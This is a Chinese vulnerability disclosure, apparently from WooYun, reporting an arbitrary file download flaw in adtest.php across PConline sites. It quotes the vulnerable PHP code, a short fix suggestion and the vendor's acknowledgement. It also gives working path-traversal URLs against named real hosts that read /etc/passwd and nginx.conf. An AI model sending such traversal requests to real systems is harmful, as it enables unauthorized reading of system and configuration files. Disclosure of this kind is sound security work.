太平洋网络网站群主站任意文件下载漏洞

漏洞详情

披露状态:

2014-03-23: 细节已通知厂商并且等待厂商处理中
2014-03-24: 厂商已经确认,细节仅向厂商公开
2014-04-03: 细节向核心白帽子及相关领域专家公开
2014-04-13: 细节向普通白帽子公开
2014-04-23: 细节向实习白帽子公开
2014-05-07: 细节向公众公开

简要描述:

太平洋网络网站群主站任意文件下载
pconline、pclady、pcauto、pcgames\...均中招

详细说明:

都知道太平洋网用的jsp,这个漏洞却发生在php

目测跟广告监控有关

地址:

http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd







我们看看这adtest.php做了神马事情。。。。

http://www.pconline.com.cn/adtest.php?url=adtest.php



<?
$uri = $_GET['url'];
$from = $_GET['from'];
$to = $_GET['to'];
$file = $HTTP_SERVER_VARS["DOCUMENT_ROOT"] . $uri;
$js = $_GET['js'];

if (file_exists($file)) {
$fd = fopen ($file, "r");
$contents = fread ($fd, filesize ($file));
fclose ($fd);
if(isset($to)){
$contents = ereg_replace("#?(src=[^>]+|showIvyViaJs0?\\(['\"])$from([^-.\\w])", "\\1$to\\2", $contents);
}else{
if(isset($js)){
$contents = ereg_replace("<script[^>]*id=[^>]*".$from."[^>]*>.*</script>|<script[^>]*>[^<]*".$from."[^<]*</script>", "<script src=".$js."></script>", $contents);
}
}
print $contents;
}else{
print "errors! Page note found!";
}
?>









漏洞证明:

http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd

http://www.pcgames.com.cn/adtest.php?url=/../../../etc/passwd

http://www.pconline.com.cn/adtest.php?url=/../../../../usr/local/nginx/conf/nginx.conf

....

修复方案:

adtest.php搞个白名单之类的,最起码不能跨目录啊

版权声明:转载请注明来源 卖身养狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-24 10:28

厂商回复:

感谢“卖身养狗”提供的漏洞信息,我们已经在安排修复中。
昵称拉风,历史遗留的php文件都给你找到,简直神一样滴存在~

最新状态:

暂无


漏洞评价: